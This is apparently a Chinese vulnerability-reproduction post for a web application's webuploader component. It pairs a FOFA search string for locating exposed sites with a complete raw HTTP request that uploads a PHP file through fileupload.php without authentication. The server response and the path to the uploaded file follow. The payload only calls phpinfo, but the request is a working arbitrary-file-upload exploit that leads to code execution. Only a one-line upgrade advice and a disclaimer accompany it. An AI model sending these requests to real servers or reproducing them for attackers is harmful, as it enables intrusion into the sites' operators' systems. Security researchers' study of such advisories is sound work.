FOFA搜索语句
"/Public/home/mhjs/jquery.js"
漏洞复现
1.向靶场发送如下数据包
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/2
Host: xxx.xxx.xx.xx
Cookie: PHPSESSID=54bc7gac1mgk0l3nm8cv6sek07; uloginid=677742617
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209------WebKitFormBoundaryqvlfcogulumndzorContent-Disposition: form-data; name="file"; filename="fpgemjsu.php"Content-Type: image/jpeg
<?php phpinfo();unlink(__FILE__);?>------WebKitFormBoundaryqvlfcogulumndzor
响应内容如下
HTTP/2 200 OK
Server: nginx
Date: Sun, 13 Oct 2024 08:55:28 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Oct 2024 08:55:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Strict-Transport-Security: max-age=31536000{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
2.访问回显文件
Public/webuploader/0.1.5/server/upload/fpgemjsu.php
修复建议
升级到最新版本。
作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。